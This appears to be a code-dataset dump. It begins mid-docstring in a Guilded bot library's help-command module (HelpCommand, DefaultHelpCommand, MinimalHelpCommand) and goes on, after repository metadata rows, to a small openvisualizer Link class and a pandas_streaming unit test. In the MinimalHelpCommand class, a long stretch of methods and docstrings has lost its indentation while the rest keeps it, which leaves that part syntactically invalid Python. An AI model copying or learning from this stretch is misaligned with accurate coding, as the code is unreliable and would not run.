    show_hidden: :class:`bool`
        Specifies if hidden commands should be shown in the output.
        Defaults to ``False``.
    verify_checks: Optional[:class:`bool`]
        Specifies if commands should have their :attr:`.Command.checks` called
        and verified. If ``True``, always calls :attr:`.Command.checks`.
        If ``None``, only calls :attr:`.Command.checks` in a guild setting.
        If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``.
    command_attrs: :class:`dict`
        A dictionary of options to pass in for the construction of the help command.
        This allows you to change the command behaviour without actually changing
        the implementation of the command. The attributes will be the same as the
        ones passed in the :class:`.Command` constructor.
    """
    # Substitutions applied by remove_mentions(); the `{8}` character classes
    # match 8-character alphanumeric IDs in user/role mentions.
    MENTION_TRANSFORMS = {
        '@everyone': '@\u200beveryone',
        '@here': '@\u200bhere',
        r'<@!?[a-zA-Z0-9]{8}>': '@deleted-user',
        r'<@&[a-zA-Z0-9]{8}>': '@deleted-role',
    }
    MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys()))
    def __new__(cls, *args, **kwargs):
        # To prevent race conditions of a single instance while also allowing
        # for settings to be passed the original arguments passed must be assigned
        # to allow for easier copies (which will be made when the help command is actually called)
        # see Rapptz/discord.py issue 2123
        self = super().__new__(cls)
        # Shallow copies cannot be used in this case since it is not unusual to pass
        # instances that need state, e.g. Paginator or what have you into the function
        # The keys can be safely copied as-is since they're 99.99% certain of being
        # string keys
        deepcopy = copy.deepcopy
        self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()}
        self.__original_args__ = deepcopy(args)
        return self
    def __init__(self, **options):
        # Pop the options this base class understands; subclasses pop theirs
        # before delegating here.
        self.show_hidden = options.pop('show_hidden', False)
        self.verify_checks = options.pop('verify_checks', True)
        self.command_attrs = attrs = options.pop('command_attrs', {})
        attrs.setdefault('name', 'help')
        attrs.setdefault('help', 'Shows this message')
        # Set for each invocation by _HelpCommandImpl.prepare / command_callback.
        self.context: Context = None
        self._command_impl = _HelpCommandImpl(self, **self.command_attrs)
    def copy(self):
        # Rebuild from the constructor arguments captured (deep copied) in
        # __new__; the command implementation object is shared, not copied.
        obj = self.__class__(*self.__original_args__, **self.__original_kwargs__)
        obj._command_impl = self._command_impl
        return obj
    def _add_to_bot(self, bot):
        # Register a fresh command implementation wrapping this help command.
        command = _HelpCommandImpl(self, **self.command_attrs)
        bot.add_command(command)
        self._command_impl = command
    def _remove_from_bot(self, bot):
        bot.remove_command(self._command_impl.name)
        # Undo any cog monkey-patching done by _inject_into_cog.
        self._command_impl._eject_cog()
    def add_check(self, func):
        """
        Adds a check to the help command.
        Parameters
        ----------
        func
            The function that will be used as a check.
        """
        self._command_impl.add_check(func)
    def remove_check(self, func):
        """
        Removes a check from the help command.
        This function is idempotent and will not raise an exception if
        the function is not in the command's checks.
        Parameters
        ----------
        func
            The function to remove from the checks.
        """
        self._command_impl.remove_check(func)
    def get_bot_mapping(self):
        """Retrieves the bot mapping passed to :meth:`send_bot_help`."""
        bot = self.context.bot
        mapping = {cog: cog.get_commands() for cog in bot.cogs.values()}
        # Commands that do not belong to any cog live under the ``None`` key.
        mapping[None] = [c for c in bot.commands if c.cog is None]
        return mapping
    @property
    def invoked_with(self):
        """Similar to :attr:`Context.invoked_with` except properly handles
        the case where :meth:`Context.send_help` is used.
        If the help command was used regularly then this returns
        the :attr:`Context.invoked_with` attribute. Otherwise, if
        the help command was called using :meth:`Context.send_help`
        then it returns the internal command name of the help command.
        Returns
        ---------
        :class:`str`
            The command name that triggered this invocation.
        """
        command_name = self._command_impl.name
        ctx = self.context
        if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name:
            return command_name
        return ctx.invoked_with
    def get_command_signature(self, command):
        """Retrieves the signature portion of the help page.
        Parameters
        ------------
        command: :class:`Command`
            The command to get the signature of.
        Returns
        --------
        :class:`str`
            The signature for the command.
        """
        # Walk up the parent chain so group prefixes appear before the command.
        parent = command.parent
        entries = []
        while parent is not None:
            if not parent.signature or parent.invoke_without_command:
                entries.append(parent.name)
            else:
                entries.append(parent.name + ' ' + parent.signature)
            parent = parent.parent
        parent_sig = ' '.join(reversed(entries))
        if len(command.aliases) > 0:
            aliases = '|'.join(command.aliases)
            fmt = f'[{command.name}|{aliases}]'
            if parent_sig:
                fmt = parent_sig + ' ' + fmt
            alias = fmt
        else:
            alias = command.name if not parent_sig else parent_sig + ' ' + command.name
        return f'{self.context.clean_prefix}{alias} {command.signature}'
    def remove_mentions(self, string):
        """Removes mentions from the string to prevent abuse.
        This includes ``@everyone``, ``@here``, member mentions and role mentions.
        Returns
        -------
        :class:`str`
            The string with mentions removed.
        """
        def replace(obj, *, transforms=self.MENTION_TRANSFORMS):
            # Literal keys map directly; regex matches fall back to '@invalid'.
            return transforms.get(obj.group(0), '@invalid')
        return self.MENTION_PATTERN.sub(replace, string)
    @property
    def cog(self):
        """A property for retrieving or setting the cog for the help command.
        When a cog is set for the help command, it is as-if the help command
        belongs to that cog. All cog special methods will apply to the help
        command and it will be automatically unset on unload.
        To unbind the cog from the help command, you can set it to ``None``.
        Returns
        --------
        Optional[:class:`Cog`]
            The cog that is currently set for the help command.
        """
        return self._command_impl.cog
    @cog.setter
    def cog(self, cog):
        # Remove whatever cog is currently valid, if any
        self._command_impl._eject_cog()
        # If a new cog is set then inject it.
        if cog is not None:
            self._command_impl._inject_into_cog(cog)
    def command_not_found(self, string):
        """|maybecoro|
        A method called when a command is not found in the help command.
        This is useful to override for i18n.
        Defaults to ``No command called {0} found.``
        Parameters
        ------------
        string: :class:`str`
            The string that contains the invalid command. Note that this has
            had mentions removed to prevent abuse.
        Returns
        ---------
        :class:`str`
            The string to use when a command has not been found.
        """
        return f'No command called "{string}" found.'
    def subcommand_not_found(self, command, string):
        """|maybecoro|
        A method called when a command did not have a subcommand requested in the help command.
        This is useful to override for i18n.
        Defaults to either:
        - ``'Command "{command.qualified_name}" has no subcommands.'``
            - If there is no subcommand in the ``command`` parameter.
        - ``'Command "{command.qualified_name}" has no subcommand named {string}'``
            - If the ``command`` parameter has subcommands but not one named ``string``.
        Parameters
        ------------
        command: :class:`Command`
            The command that did not have the subcommand requested.
        string: :class:`str`
            The string that contains the invalid subcommand. Note that this has
            had mentions removed to prevent abuse.
        Returns
        ---------
        :class:`str`
            The string to use when the command did not have the subcommand requested.
        """
        if isinstance(command, Group) and len(command.all_commands) > 0:
            return f'Command "{command.qualified_name}" has no subcommand named {string}'
        return f'Command "{command.qualified_name}" has no subcommands.'
    async def filter_commands(self, commands, *, sort=False, key=None):
        """|coro|
        Returns a filtered list of commands and optionally sorts them.
        This takes into account the :attr:`verify_checks` and :attr:`show_hidden`
        attributes.
        Parameters
        ------------
        commands: Iterable[:class:`Command`]
            An iterable of commands that are getting filtered.
        sort: :class:`bool`
            Whether to sort the result.
        key: Optional[Callable[:class:`Command`, Any]]
            An optional key function to pass to :func:`py:sorted` that
            takes a :class:`Command` as its sole parameter. If ``sort`` is
            passed as ``True`` then this will default as the command name.
        Returns
        ---------
        List[:class:`Command`]
            A list of commands that passed the filter.
        """
        if sort and key is None:
            key = lambda c: c.name
        iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands)
        if self.verify_checks is False:
            # if we do not need to verify the checks then we can just
            # run it straight through normally without using await.
            return sorted(iterator, key=key) if sort else list(iterator)
        if self.verify_checks is None and not self.context.guild:
            # if verify_checks is None and we're in a DM, don't verify
            return sorted(iterator, key=key) if sort else list(iterator)
        # if we're here then we need to check every command if it can run
        async def predicate(cmd):
            try:
                return await cmd.can_run(self.context)
            except CommandError:
                # A failing check means the command is simply filtered out.
                return False
        ret = []
        for cmd in iterator:
            valid = await predicate(cmd)
            if valid:
                ret.append(cmd)
        if sort:
            ret.sort(key=key)
        return ret
    def get_max_size(self, commands):
        """Returns the largest name length of the specified command list.
        Parameters
        ------------
        commands: Sequence[:class:`Command`]
            A sequence of commands to check for the largest size.
        Returns
        --------
        :class:`int`
            The maximum width of the commands.
        """
        as_lengths = (guilded.utils._string_width(c.name) for c in commands)
        return max(as_lengths, default=0)
    def get_destination(self):
        """Returns the :class:`~guilded.abc.Messageable` where the help command will be output.
        You can override this method to customise the behaviour.
        By default this returns the context's channel.
        Returns
        -------
        :class:`.abc.Messageable`
            The destination where the help command will be output.
        """
        return self.context.channel
    async def send_error_message(self, error):
        """|coro|
        Handles the implementation when an error happens in the help command.
        For example, the result of :meth:`command_not_found` will be passed here.
        You can override this method to customise the behaviour.
        By default, this sends the error message to the destination
        specified by :meth:`get_destination`.
        .. note::
            You can access the invocation context with :attr:`HelpCommand.context`.
        Parameters
        ------------
        error: :class:`str`
            The error message to display to the user. Note that this has
            had mentions removed to prevent abuse.
        """
        destination = self.get_destination()
        await destination.send(error)
    @_not_overriden
    async def on_help_command_error(self, ctx, error):
        """|coro|
        The help command's error handler, as specified by :ref:`ext_commands_error_handler`.
        Useful to override if you need some specific behaviour when the error handler
        is called.
        By default this method does nothing and just propagates to the default
        error handlers.
        Parameters
        ------------
        ctx: :class:`Context`
            The invocation context.
        error: :class:`CommandError`
            The error that was raised.
        """
        pass
    async def send_bot_help(self, mapping):
        """|coro|
        Handles the implementation of the bot command page in the help command.
        This function is called when the help command is called with no arguments.
        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.
        You can override this method to customise the behaviour.
        .. note::
            You can access the invocation context with :attr:`HelpCommand.context`.
            Also, the commands in the mapping are not filtered. To do the filtering
            you will have to call :meth:`filter_commands` yourself.
        Parameters
        ------------
        mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]]
            A mapping of cogs to commands that have been requested by the user for help.
            The key of the mapping is the :class:`~.commands.Cog` that the command belongs to, or
            ``None`` if there isn't one, and the value is a list of commands that belongs to that cog.
        """
        return None
    async def send_cog_help(self, cog):
        """|coro|
        Handles the implementation of the cog page in the help command.
        This function is called when the help command is called with a cog as the argument.
        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.
        You can override this method to customise the behaviour.
        .. note::
            You can access the invocation context with :attr:`HelpCommand.context`.
            To get the commands that belong to this cog see :meth:`Cog.get_commands`.
            The commands returned are not filtered. To do the filtering you will have to call
            :meth:`filter_commands` yourself.
        Parameters
        -----------
        cog: :class:`Cog`
            The cog that was requested for help.
        """
        return None
    async def send_group_help(self, group):
        """|coro|
        Handles the implementation of the group page in the help command.
        This function is called when the help command is called with a group as the argument.
        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.
        You can override this method to customise the behaviour.
        .. note::
            You can access the invocation context with :attr:`HelpCommand.context`.
            To get the commands that belong to this group without aliases see
            :attr:`Group.commands`. The commands returned are not filtered. To do the
            filtering you will have to call :meth:`filter_commands` yourself.
        Parameters
        -----------
        group: :class:`Group`
            The group that was requested for help.
        """
        return None
    async def send_command_help(self, command):
        """|coro|
        Handles the implementation of the single command page in the help command.
        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.
        You can override this method to customise the behaviour.
        .. note::
            You can access the invocation context with :attr:`HelpCommand.context`.
        .. admonition:: Showing Help
            :class: helpful
            There are certain attributes and methods that are helpful for a help command
            to show such as the following:
            - :attr:`Command.help`
            - :attr:`Command.brief`
            - :attr:`Command.short_doc`
            - :attr:`Command.description`
            - :meth:`get_command_signature`
            There are more than just these attributes but feel free to play around with
            these to help you get started to get the output that you want.
        Parameters
        -----------
        command: :class:`Command`
            The command that was requested for help.
        """
        return None
    async def prepare_help_command(self, ctx, command=None):
        """|coro|
        A low level method that can be used to prepare the help command
        before it does anything. For example, if you need to prepare
        some state in your subclass before the command does its processing
        then this would be the place to do it.
        The default implementation does nothing.
        .. note::
            This is called *inside* the help command callback body. So all
            the usual rules that happen inside apply here as well.
        Parameters
        -----------
        ctx: :class:`Context`
            The invocation context.
        command: Optional[:class:`str`]
            The argument passed to the help command.
        """
        pass
    async def command_callback(self, ctx, *, command=None):
        """|coro|
        The actual implementation of the help command.
        It is not recommended to override this method and instead change
        the behaviour through the methods that actually get dispatched.
        - :meth:`send_bot_help`
        - :meth:`send_cog_help`
        - :meth:`send_group_help`
        - :meth:`send_command_help`
        - :meth:`get_destination`
        - :meth:`command_not_found`
        - :meth:`subcommand_not_found`
        - :meth:`send_error_message`
        - :meth:`on_help_command_error`
        - :meth:`prepare_help_command`
        """
        await self.prepare_help_command(ctx, command)
        bot = ctx.bot
        if command is None:
            mapping = self.get_bot_mapping()
            return await self.send_bot_help(mapping)
        # Check if it's a cog
        cog = bot.get_cog(command)
        if cog is not None:
            return await self.send_cog_help(cog)
        maybe_coro = guilded.utils.maybe_coroutine
        # If it's not a cog then it's a command.
        # Since we want to have detailed errors when someone
        # passes an invalid subcommand, we need to walk through
        # the command group chain ourselves.
        keys = command.split(' ')
        cmd = bot.all_commands.get(keys[0])
        if cmd is None:
            string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0]))
            return await self.send_error_message(string)
        for key in keys[1:]:
            try:
                # Non-group commands have no `all_commands` -> AttributeError.
                found = cmd.all_commands.get(key)
            except AttributeError:
                string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key))
                return await self.send_error_message(string)
            else:
                if found is None:
                    string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key))
                    return await self.send_error_message(string)
                cmd = found
        if isinstance(cmd, Group):
            return await self.send_group_help(cmd)
        else:
            return await self.send_command_help(cmd)
class DefaultHelpCommand(HelpCommand):
    """The implementation of the default help command.
    This inherits from :class:`HelpCommand`.
    It extends it with the following attributes.
    Attributes
    ------------
    width: :class:`int`
        The maximum number of characters that fit in a line.
        Defaults to 80.
    sort_commands: :class:`bool`
        Whether to sort the commands in the output alphabetically. Defaults to ``True``.
    dm_help: Optional[:class:`bool`]
        A tribool that indicates if the help command should DM the user instead of
        sending it to the channel it received it from. If the boolean is set to
        ``True``, then all help output is DM'd. If ``False``, none of the help
        output is DM'd. If ``None``, then the bot will only DM when the help
        message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
        Defaults to ``False``.
    dm_help_threshold: Optional[:class:`int`]
        The number of characters the paginator must accumulate before getting DM'd to the
        user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
    indent: :class:`int`
        How much to indent the commands from a heading. Defaults to ``2``.
    commands_heading: :class:`str`
        The command list's heading string used when the help command is invoked with a category name.
        Useful for i18n. Defaults to ``"Commands:"``
    no_category: :class:`str`
        The string used when there is a command which does not belong to any category(cog).
        Useful for i18n. Defaults to ``"No Category"``
    paginator: :class:`Paginator`
        The paginator used to paginate the help command output.
    """
    def __init__(self, **options):
        # Pop the options this subclass understands; the rest is forwarded
        # to HelpCommand.__init__.
        self.width = options.pop('width', 80)
        self.indent = options.pop('indent', 2)
        self.sort_commands = options.pop('sort_commands', True)
        self.dm_help = options.pop('dm_help', False)
        self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
        self.commands_heading = options.pop('commands_heading', "Commands:")
        self.no_category = options.pop('no_category', 'No Category')
        self.paginator = options.pop('paginator', None)
        if self.paginator is None:
            self.paginator = Paginator()
        super().__init__(**options)
    def shorten_text(self, text):
        """:class:`str`: Shortens text to fit into the :attr:`width`."""
        if len(text) > self.width:
            # Reserve 3 characters for the ellipsis.
            return text[:self.width - 3].rstrip() + '...'
        return text
    def get_ending_note(self):
        """:class:`str`: Returns help command's ending note. This is mainly useful to override for i18n purposes."""
        command_name = self.invoked_with
        return (
            f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n"
            f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category."
        )
    def add_indented_commands(self, commands, *, heading, max_size=None):
        """Indents a list of commands after the specified heading.
        The formatting is added to the :attr:`paginator`.
        The default implementation is the command name indented by
        :attr:`indent` spaces, padded to ``max_size`` followed by
        the command's :attr:`Command.short_doc` and then shortened
        to fit into the :attr:`width`.
        Parameters
        -----------
        commands: Sequence[:class:`Command`]
            A list of commands to indent for output.
        heading: :class:`str`
            The heading to add to the output. This is only added
            if the list of commands is greater than 0.
        max_size: Optional[:class:`int`]
            The max size to use for the gap between indents.
            If unspecified, calls :meth:`~HelpCommand.get_max_size` on the
            commands parameter.
        """
        if not commands:
            return
        self.paginator.add_line(heading)
        max_size = max_size or self.get_max_size(commands)
        get_width = guilded.utils._string_width
        for command in commands:
            name = command.name
            # Adjust padding for names whose display width (per
            # _string_width) differs from len(), e.g. wide characters.
            width = max_size - (get_width(name) - len(name))
            entry = f'{self.indent * " "}{name:<{width}} {command.short_doc}'
            self.paginator.add_line(self.shorten_text(entry))
    async def send_pages(self):
        """A helper utility to send the page output from :attr:`paginator` to the destination."""
        destination = self.get_destination()
        for page in self.paginator.pages:
            await destination.send(page)
    def add_command_formatting(self, command):
        """A utility function to format the non-indented block of commands and groups.
        Parameters
        ------------
        command: :class:`Command`
            The command to format.
        """
        if command.description:
            self.paginator.add_line(command.description, empty=True)
        signature = self.get_command_signature(command)
        self.paginator.add_line(signature, empty=True)
        if command.help:
            try:
                self.paginator.add_line(command.help, empty=True)
            except RuntimeError:
                # The help text is longer than a single page allows; fall
                # back to adding it line by line so it can paginate.
                for line in command.help.splitlines():
                    self.paginator.add_line(line)
                self.paginator.add_line()
    def get_destination(self):
        # dm_help is a tribool: True -> always DM, None -> DM only when the
        # accumulated output exceeds dm_help_threshold, False -> channel.
        ctx = self.context
        if self.dm_help is True:
            return ctx.author
        elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold:
            return ctx.author
        else:
            return ctx.channel
    async def prepare_help_command(self, ctx, command):
        # Reset the paginator for every invocation; this instance is a fresh
        # copy but the paginator option may be a shared object.
        self.paginator.clear()
        await super().prepare_help_command(ctx, command)
    async def send_bot_help(self, mapping):
        ctx = self.context
        bot = ctx.bot
        if bot.description:
            # <description> portion
            self.paginator.add_line(bot.description, empty=True)
        no_category = f'\u200b{self.no_category}:'
        def get_category(command, *, no_category=no_category):
            cog = command.cog
            return cog.qualified_name + ':' if cog is not None else no_category
        # Sorting and grouping must use the same key so groupby produces a
        # single contiguous run per category.
        filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)
        max_size = self.get_max_size(filtered)
        to_iterate = itertools.groupby(filtered, key=get_category)
        # Now we can add the commands to the page.
        for category, commands in to_iterate:
            commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)
            self.add_indented_commands(commands, heading=category, max_size=max_size)
        note = self.get_ending_note()
        if note:
            self.paginator.add_line()
            self.paginator.add_line(note)
        await self.send_pages()
    async def send_command_help(self, command):
        self.add_command_formatting(command)
        self.paginator.close_page()
        await self.send_pages()
    async def send_group_help(self, group):
        self.add_command_formatting(group)
        filtered = await self.filter_commands(group.commands, sort=self.sort_commands)
        self.add_indented_commands(filtered, heading=self.commands_heading)
        if filtered:
            note = self.get_ending_note()
            if note:
                self.paginator.add_line()
                self.paginator.add_line(note)
        await self.send_pages()
    async def send_cog_help(self, cog):
        if cog.description:
            self.paginator.add_line(cog.description, empty=True)
        filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)
        self.add_indented_commands(filtered, heading=self.commands_heading)
        note = self.get_ending_note()
        if note:
            self.paginator.add_line()
            self.paginator.add_line(note)
        await self.send_pages()
class MinimalHelpCommand(HelpCommand):
"""An implementation of a help command with minimal output.
This inherits from :class:`HelpCommand`.
Attributes
------------
sort_commands: :class:`bool`
Whether to sort the commands in the output alphabetically. Defaults to ``True``.
commands_heading: :class:`str`
The command list's heading string used when the help command is invoked with a category name.
Useful for i18n. Defaults to ``"Commands"``
aliases_heading: :class:`str`
The alias list's heading string used to list the aliases of the command. Useful for i18n.
Defaults to ``"Aliases:"``.
dm_help: Optional[:class:`bool`]
A tribool that indicates if the help command should DM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is DM'd. If ``False``, none of the help
output is DM'd. If ``None``, then the bot will only DM when the help
message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
Defaults to ``False``.
dm_help_threshold: Optional[:class:`int`]
The number of characters the paginator must accumulate before getting DM'd to the
user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
no_category: :class:`str`
The string used when there is a command which does not belong to any category(cog).
Useful for i18n. Defaults to ``"No Category"``
paginator: :class:`Paginator`
The paginator used to paginate the help command output.
"""
def __init__(self, **options):
self.sort_commands = options.pop('sort_commands', True)
self.commands_heading = options.pop('commands_heading', "Commands")
self.dm_help = options.pop('dm_help', False)
self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
self.aliases_heading = options.pop('aliases_heading', "Aliases:")
self.no_category = options.pop('no_category', 'No Category')
self.paginator = options.pop('paginator', None)
if self.paginator is None:
self.paginator = Paginator(suffix=None, prefix=None)
super().__init__(**options)
async def send_pages(self):
"""A helper utility to send the page output from :attr:`paginator` to the destination."""
destination = self.get_destination()
for page in self.paginator.pages:
await destination.send(page)
def get_opening_note(self):
"""Returns help command's opening note. This is mainly useful to override for i18n purposes.
The default implementation returns ::
Use `{prefix}{command_name} [command]` for more info on a command.
You can also use `{prefix}{command_name} [category]` for more info on a category.
Returns
-------
:class:`str`
The help command opening note.
"""
command_name = self.invoked_with
return (
f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n"
f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category."
)
def get_command_signature(self, command):
return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}'
    def get_ending_note(self):
        """Return the help command's ending note. This is mainly useful to override for i18n purposes.
        The default implementation does nothing.
        Returns
        -------
        :class:`str`
            The help command ending note.
        """
        # Returning None suppresses the ending note entirely.
        return None
    def add_bot_commands_formatting(self, commands, heading):
        """Adds the minified bot heading with commands to the output.
        The formatting should be added to the :attr:`paginator`.
        The default implementation is a bold underline heading followed
        by commands separated by an EN SPACE (U+2002) in the next line.
        Parameters
        -----------
        commands: Sequence[:class:`Command`]
            A list of commands that belong to the heading.
        heading: :class:`str`
            The heading to add to the line.
        """
        if commands:
            # U+2002 is an EN SPACE (the original "Middle Dot" note was wrong).
            joined = '\u2002'.join(c.name for c in commands)
            self.paginator.add_line(f'__**{heading}**__')
            self.paginator.add_line(joined)
    def add_subcommand_formatting(self, command):
        """Adds formatting information on a subcommand.
        The formatting should be added to the :attr:`paginator`.
        The default implementation is the prefix and the :attr:`Command.qualified_name`
        optionally followed by an En dash and the command's :attr:`Command.short_doc`.
        Parameters
        -----------
        command: :class:`Command`
            The command to show information of.
        """
        # Only emit the EN DASH separator when there is a short description.
        fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}'
        self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc))
    def add_aliases_formatting(self, aliases):
        """Adds the formatting information on a command's aliases.
        The formatting should be added to the :attr:`paginator`.
        The default implementation is the :attr:`aliases_heading` bolded
        followed by a comma separated list of aliases.
        This is not called if there are no aliases to format.
        Parameters
        -----------
        aliases: Sequence[:class:`str`]
            A list of aliases to format.
        """
        # empty=True requests a blank line after the alias list.
        self.paginator.add_line(f'**{self.aliases_heading}** {", ".join(aliases)}', empty=True)
    def add_command_formatting(self, command):
        """A utility function to format commands and groups.
        Parameters
        ------------
        command: :class:`Command`
            The command to format.
        """
        if command.description:
            self.paginator.add_line(command.description, empty=True)
        signature = self.get_command_signature(command)
        if command.aliases:
            self.paginator.add_line(signature)
            self.add_aliases_formatting(command.aliases)
        else:
            self.paginator.add_line(signature, empty=True)
        if command.help:
            try:
                self.paginator.add_line(command.help, empty=True)
            except RuntimeError:
                # add_line refused the help text -- presumably it exceeds the
                # page size as a single chunk; fall back to line-by-line.
                for line in command.help.splitlines():
                    self.paginator.add_line(line)
                self.paginator.add_line()
def get_destination(self):
ctx = self.context
if self.dm_help is True:
return ctx.author
elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold:
return ctx.author
else:
return ctx.channel
    async def prepare_help_command(self, ctx, command):
        # Start every invocation from an empty paginator.
        self.paginator.clear()
        await super().prepare_help_command(ctx, command)
    async def send_bot_help(self, mapping):
        ctx = self.context
        bot = ctx.bot
        if bot.description:
            self.paginator.add_line(bot.description, empty=True)
        note = self.get_opening_note()
        if note:
            self.paginator.add_line(note, empty=True)
        # Zero-width-space prefix keeps the fallback bucket distinct from a
        # real cog name and sorts it after ASCII category names.
        no_category = f'\u200b{self.no_category}'
        def get_category(command, *, no_category=no_category):
            cog = command.cog
            return cog.qualified_name if cog is not None else no_category
        filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)
        # groupby only groups adjacent items, hence sort=True with the same key.
        to_iterate = itertools.groupby(filtered, key=get_category)
        for category, commands in to_iterate:
            commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)
            self.add_bot_commands_formatting(commands, category)
        note = self.get_ending_note()
        if note:
            self.paginator.add_line()
            self.paginator.add_line(note)
        await self.send_pages()
    async def send_cog_help(self, cog):
        bot = self.context.bot
        if bot.description:
            self.paginator.add_line(bot.description, empty=True)
        note = self.get_opening_note()
        if note:
            self.paginator.add_line(note, empty=True)
        if cog.description:
            self.paginator.add_line(cog.description, empty=True)
        # Hide commands the invoker cannot run; optionally sort them.
        filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)
        if filtered:
            self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**')
            for command in filtered:
                self.add_subcommand_formatting(command)
        note = self.get_ending_note()
        if note:
            self.paginator.add_line()
            self.paginator.add_line(note)
        await self.send_pages()
    async def send_group_help(self, group):
        self.add_command_formatting(group)
        filtered = await self.filter_commands(group.commands, sort=self.sort_commands)
        if filtered:
            note = self.get_opening_note()
            if note:
                self.paginator.add_line(note, empty=True)
            # Subcommand listing mirrors send_cog_help's layout.
            self.paginator.add_line(f'**{self.commands_heading}**')
            for command in filtered:
                self.add_subcommand_formatting(command)
            note = self.get_ending_note()
            if note:
                self.paginator.add_line()
                self.paginator.add_line(note)
        await self.send_pages()
    async def send_command_help(self, command):
        self.add_command_formatting(command)
        # Flush the partially-filled page so it appears in paginator.pages.
        self.paginator.close_page()
        await self.send_pages()
| 36.137676 | 133 | 0.630228 |
79545bafbf7a82d975907af756fe6ae4d1b28375 | 271 | py | Python | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | null | null | null | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | 4 | 2020-05-06T14:51:09.000Z | 2020-05-25T11:42:28.000Z | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | 1 | 2020-12-01T07:58:52.000Z | 2020-12-01T07:58:52.000Z | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from multiprocessing.queues import Queue
class Link:
    """Describes the one-way link quality between two simulated motes."""
    def __init__(self, pdr: int, rx: 'Queue'):
        # rx: receiving mote's inbox queue; pdr: packet delivery ratio
        self.rx = rx
        self.pdr = pdr
79545c151ee82832320cdb61ed1ecabb82c73329 | 1,786 | py | Python | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 20 | 2017-09-23T03:23:13.000Z | 2022-02-21T09:10:48.000Z | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 19 | 2017-09-24T17:10:39.000Z | 2021-12-29T11:02:58.000Z | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 7 | 2018-11-09T08:15:20.000Z | 2021-09-17T07:39:44.000Z | # -*- coding: utf-8 -*-
"""
@brief test log(time=4s)
"""
import unittest
import pandas
import numpy
from pyquickhelper.pycode import ExtTestCase
from pandas_streaming.df import dataframe_unfold
from pandas_streaming.df.dataframe_helpers import hash_int, hash_str, hash_float
class TestDataFrameHelpersSimple(ExtTestCase):
    def test_unfold(self):
        """Unfold a comma-separated column, then fold it back and compare."""
        df = pandas.DataFrame([dict(a=1, b="e,f"),
                               dict(a=2, b="g"),
                               dict(a=3)])
        df2 = dataframe_unfold(df, "b")
        # One row per comma-separated token; NaN rows pass through untouched.
        exp = pandas.DataFrame([dict(a=1, b="e,f", b_unfold="e"),
                                dict(a=1, b="e,f", b_unfold="f"),
                                dict(a=2, b="g", b_unfold="g"),
                                dict(a=3)])
        self.assertEqualDataFrame(df2, exp)
        # fold
        folded = df2.groupby('a').apply(lambda row: ','.join(
            row['b_unfold'].dropna()) if len(row['b_unfold'].dropna()) > 0 else numpy.nan)
        bf = folded.reset_index(drop=False)
        bf.columns = ['a', 'b']
        self.assertEqualDataFrame(df, bf)
    def test_hash_except(self):
        """NaN inputs pass through the hash helpers; wrong types raise."""
        self.assertRaise(lambda: hash_int(0.1, 3),
                         ValueError, "numpy.nan expected")
        r = hash_int(numpy.nan, 3)
        self.assertTrue(numpy.isnan(r))
        self.assertRaise(lambda: hash_str(0.1, 3),
                         ValueError, "numpy.nan expected")
        r = hash_str(numpy.nan, 3)
        self.assertTrue(numpy.isnan(r))
        self.assertRaise(lambda: hash_float("0.1", 3), TypeError, "isnan")
        r = hash_float(numpy.nan, 3)
        self.assertTrue(numpy.isnan(r))
        # Hash length is capped by the second argument.
